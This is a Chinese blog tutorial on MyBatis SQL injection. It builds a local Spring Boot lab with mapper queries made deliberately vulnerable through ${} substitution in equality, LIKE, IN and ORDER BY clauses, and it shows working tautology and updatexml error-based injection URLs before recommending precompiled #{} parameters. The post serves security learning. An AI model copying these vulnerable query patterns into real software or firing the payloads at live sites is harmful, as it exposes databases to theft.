[Java安全]—Mybatis注入

已于 2022-11-16 19:35:36 修改
阅读量2.5k 收藏 5
点赞数 3
分类专栏: Java 文章标签: mybatis java 安全
于 2022-09-30 09:24:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/127117638
版权

文章目录

前言

Mybatis注入留在了Spring后,因为感觉用Spring搭建web端后再进行注入比较贴合实际一些。

测试环境

Mysql:5.7

Springboot:2.1

mybatis:3.5

数据库

创建了一个测试用的数据库Mybatis

CREATE DATABASE /*!32312 IF NOT EXISTS*/`mybatis` /*!40100 DEFAULT CHARACTER SET utf8 */;

USE `mybatis`;

-- ----------------------------
-- Table structure for users
-- ----------------------------
DROP TABLE IF EXISTS `users`;
CREATE TABLE `users`  (
  `uid` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(10) CHARACTER SET utf8 COLLATE utf8_unicode_ci NULL DEFAULT NULL,
  `uage` int(10) NULL DEFAULT NULL,
  PRIMARY KEY (`uid`) USING BTREE
) ENGINE = MyISAM AUTO_INCREMENT = 4 CHARACTER SET = utf8 COLLATE = utf8_unicode_ci ROW_FORMAT = Dynamic;

-- ----------------------------
-- Records of users
-- ----------------------------
INSERT INTO `users` VALUES (1, 'Sentiment', 20);
INSERT INTO `users` VALUES (2, 'Shelter', 20);
INSERT INTO `users` VALUES (3, 'Tana', 18);

在这里插入图片描述

SQL注入的四种方式

这里用的Springboot环境,配置文件较多,先放出关键文件,最终项目放在后边

#{}和${}

接口

List<User> selectOne(@Param("uname") String uname);

配置

<select id="selectOne" resultType="user">
    select * from users where uname = '${uname}'
</select>

测试

@GetMapping("/inject/1")
@ResponseBody
public List<User> selectOne(@RequestParam("uname") String uname) {
    return userService.selectOne(uname);
}

执行语句是select * from users where uname = '${uname}',所以这里就可以直接联想到单引号闭合即可,所以用万能密码1’ or ‘1’='1进行测试

http://127.0.0.1:8080/inject/1?uname=1' or '1'='1

在这里插入图片描述

发现成功注入,但是如果将${}换成#{}后则会报错无法执行,原因在于:#{}相当于是进行了预编译的方式,所以就有效的避免了sql注入问题

模糊查询

这里在前篇提到过模糊查询的三种方式

select * from t_user where username like '%${mohu}%'
select * from t_user where username like "%"#{mohu}"%"
select * from t_user where username like concat('%',#{mohu},'%')

可以看到第二条中,"%"#{mohu}"%"预编译前后的%是独立出来的,而写成'%#{mohu}%'这种形式,预编译时就会将%当做字符来处理从而报错,此时若经验不足将#改成了$即:'%${mohu}%',就会导致SQL注入问题

接口

String selectTwo(@Param("uname") String uname);

配置

<select id="selectTwo" resultType="user">
    select * from users where uname like '%${uname}%'
</select>

测试

这里由于换了查询方式就无法在使用万能密码获取数据,所以这里将返回类型改为了String,这样就可以通过报错信息来获取我们注入的内容

@GetMapping("/inject/2")
@ResponseBody
public String selectTwo(@RequestParam("uname") String uname) {
    try {
        return userService.selectTwo(uname);
    }catch (Throwable e){
        return e.toString();
    }
}

http://127.0.0.1:8080/inject/2?uname=1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

在这里插入图片描述

In查询

当查询语句有in是,只需要将in后的内容进行闭合即可绕过

配置

<select id="selectThree" resultType="user">
    select * from users where uid in (${uid})
</select>

其他内容都跟模糊查询一样就不贴了

http://127.0.0.1:8080/inject/3?uid=1)  or updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

在这里插入图片描述

order by注入

和in查询原理基本相同

<select id="selectFour" resultType="user">
    select * from users order by ${uid}
</select>

http://127.0.0.1:8080/inject/4?uid=1 and(updatexml(1,concat(0x7e,(select database())),0));

在这里插入图片描述

综上情况来看,要避免mybatis的注入问题,其实最好的方式就是使用预编译方式

项目文件

链接:https://pan.baidu.com/s/1B3Ui-KeGL001JVgFjs9l5g?pwd=1axd 
提取码:1axd

java -jar mybatis.jar 运行即可

在这里插入图片描述

S1nJa
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
狂神说java MyBatis 笔记
12-31
MyBatis 可以很好地与 Spring 集成,实现 DAO 层的依赖注入,同时 Spring 还能帮助管理 MyBatis 的事务。此外,MyBatis 也能够与 Mybatis-Plus、Mybatis-Spring-Boot-Starter 等扩展库结合,进一步简化开发工作。 ...
java-mybatis.rar
10-28
Java、SpringMvc 和 Mybatis 是三个在Web开发中广泛应用的技术框架。Java作为后端编程语言,SpringMvc作为Spring框架的一部分,提供了MVC(Model-View-Controller)模式来处理HTTP请求,而Mybatis则是一个轻量级的...
mybatis ${} sql注入
建伟博客
03-22 4865
mybatis中${}的sql注入解决方案主要解决sql的like 、in 、order by 注入问题,其他查询也可以参照下面解决建议首先#{}和${}在预编译中的处理是不一样的。#{}在预处理时,会把参数部分用一个占位符 ?代替,变成如下的sql语句:select * from user where name = ?;${}则只是简单的字符串替换,在动态解析阶段,该sql语句会被解析成sele...
利用mybatis框架时,常见的三种sql注入方式
geejkse_seff的博客
08-31 2522
Sql注入是web应用中最常见的一种漏洞,其实质就是攻击者可以通过拼接sql来对数据库进行攻击。在java项目中,随着预编译和ORM框架(如Mybatis)的使用,这样的问题也会随之减少,但是,在mybatis使用不当的情况下,也会造成sql注入。...
巧用MybatisPlus的SQL注入器提升批量插入性能
最新发布
战斧的博客
05-20 4392
上一次我们给大家详细讲解 MybatisPlus 的条件构造器wrapper。这次我们来讲另一个开发者需要了解的功能——SQL注入器,并以实战视角讲述如何利用该特性提升MybatisPlus 的批量插入性能
MyBatis 中 SQL 注入攻击的3种方式,真是防不胜防!
2301_78526383的博客
06-17 761
以上就是mybatis的sql注入审计的基本方法,我们没有分析的几个点也有问题,新手可以尝试分析一下不同的注入点来实操一遍,相信会有更多的收获。当我们再遇到类似问题时可以考虑:1、Mybatis框架下审计SQL注入,重点关注在三个方面like,in和order by2、xml方式编写sql时,可以先筛选xml文件搜索$,逐个分析,要特别注意mybatis-generator的order by注入3、Mybatis注解编写sql时方法类似。
MyBatis单表查询——参数占位符${}和#{}、SQL注入、like查询
LYJbao的博客
03-25 2172
目录前言: 1、参数占位符:${}和#{}2、SQL注入 3、${}的优点小结:$ VS #:4、like查询 解决方案,使用MySQL的内置函数concat()来处理 以下文章,对于没有接触过Mybatis的小伙伴来说,需要看完这篇文章才可以继续向下执行:http://t.csdn.cn/nGTFZ其次,我们为了更好地观察出现的问题,可以在配置文件中,配置打印MyBatis的执行SQL: 1、参数占位符:${}和#{} 我们在mapper的.xml文件中,进行数据库的SQL语句编
mybatis的sql注入问题之$与#
weixin_38972910的博客
12-26 1131
mybatis中使用$符号 不会进行预编译,会被sql注入 注入方式如下: 密码随便输一个就可以通过验证,只要用户名正确即可。 这样输入后查询语句在数据库中如下:   select id,username,password from userLogin where username='admin' OR 1=1 and password='23' sql解释:AND优先级高于...
java_mybatis
06-06
4. TypeHandler 类型处理器:MyBatis 提供了自动转换 Java 类型与数据库类型的能力,TypeHandler 负责 Java 值到 SQL 参数的设置,以及 SQL 结果到 Java 值的转换。 5. 映射器工厂(MapperFactoryBean):在 Spring...
java基于mybatis的家谱管理系统源码.zip
10-27
【标题】:基于Java MyBatis的家谱管理系统源码分析 在当今的软件开发领域,Java语言以其稳定性和强大的库支持,常被用于构建复杂的业务系统。MyBatis作为一个优秀的持久层框架,极大地简化了数据库操作,使得...
Javamybatis面试题.docx
06-16
MyBatis 是一款著名的 Java 持久层框架,它专注于 SQL 查询的处理,使得开发者能够更加关注 SQL 语句的编写,同时提供了一种灵活的映射机制,将 SQL 查询的结果自动映射到 Java 对象。MyBatis 由以下几个核心组件...
JdbcTemplate、mybatismybatis-plus的依赖注入及原理和应用实现
Lennon__的博客
11-09 473
MyBatis是一个优秀的持久层框架,它通过XML或注解的方式将Java方法与SQL语句进行映射,提供了灵活的SQL编写和结果映射功能。JdbcTemplate的原理是通过封装JDBC的操作,提供了一系列的模板方法,简化了数据库操作的流程,包括连接管理、异常处理、SQL执行等。MyBatis-Plus是MyBatis的增强工具,它在MyBatis的基础上提供了更多的便捷功能,包括代码生成器、通用CRUD操作、分页插件等。1.配置数据源:在MyBatis-Plus配置文件中配置数据源信息。
mybatis #和$的区别及$的sql注入示例
qq_41516802的博客
07-27 476
关于mybatis的#和$的区别,以及$产生sql注入的小例子
java编程学习笔记——mybatis SQL注入问题
玩赚AI大模型的博客
08-30 758
SQL 注入攻击  首先了解下概念,什么叫SQL 注入:  SQL注入攻击,简称SQL攻击或注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。  最常见的就是我们在应用程序中使用字符串联结...
mybatis中的#和$的区别 以及 防止sql注入
bruce_sky的专栏
05-26 1万+
声明:这是转载的。 mybatis中的#和$的区别 1. #将传入的数据都当成一个字符串,会对自动传入的数据加一个双引号。如:order by #user_id#,如果传入的值是111,那么解析成sql时的值为order by "111", 如果传入的值是id,则解析成的sql为order by "id".    2. $将传入的数据直接显示生成在sql中。如:order by $user
mybatis的sql注入
学习天地
08-29 1443
mybatis中的sql注入:  #{id} : #号,启用预编译功能,执行前会先将sql发送给数据库进行编译,执行时,直接使用编译好的sql替换占位符?即可。用的是PreparedStatement  ${table}:${}是未经过预编译的,仅仅是取变量的值,是非安全的,存在SQL注入。这个必须手动处理过滤一下输入的内容。 下面介绍几种查询避免sql注入的案例 1.模糊查询like的两种...
mybatis sql 如何去注入
非学无以广才,非志无以成学
09-16 2467
        网上搜索了很多关于mybatis sql  注入的 出来的基本都是如何防止sql注入,好奇心驱使下,非常想知道如何注入的,研究一番后终于针对like成功了注入了一次。特别说明本次注入是针对mybaits代码中使用了like的语句 先看以下代码  数据库中有 账号admin 和 密码aaaaaa这样一个账号 假设这个就是登录代码 (在登录时很大概率不会是这样的代码,这里主要...
[安全] MyBatis如何防止SQL注入
简放视野的专栏
06-06 368
如果我们order by语句后用了${},那么不做任何处理的时候是存在SQL注入危险的。你说怎么防止,那我只能悲惨的告诉你,你得手动处理过滤一下输入的内容。如判断一下输入的参数的长度是否正常(注入语句一般很长),类在起作用,PreparedStatement是我们很熟悉的Statement的子类,它的对象。所以,在我们的应用中需要做一些工作,来防备这样的攻击方式。{xxx}”这样的参数,要手工地做好过滤工作,来防止SQL注入攻击。(上面的对比示例是我自己添加的,为了与前面的示例形成鲜明的对比。
MyBatis如何防止SQL注入
热门推荐
fmwind的专栏
03-01 1万+
SQL注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的SQL语句被插入到执行的实体字段中 SQL注入,大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or ‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以,在我们的应用中需要做一些工作,来防备这样的攻击方式。在一些安全性要求很高的应用中(比如银行软件),经常使用将SQL
java mybatis注入
08-31
下面是一些方法可以用来防止Java MyBatis注入攻击: 1. 使用参数化查询:使用预编译的参数化查询语句可以有效地防止注入攻击。参数化查询包括使用“?”占位符代替实际的参数值,并将参数值和查询语句分开。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值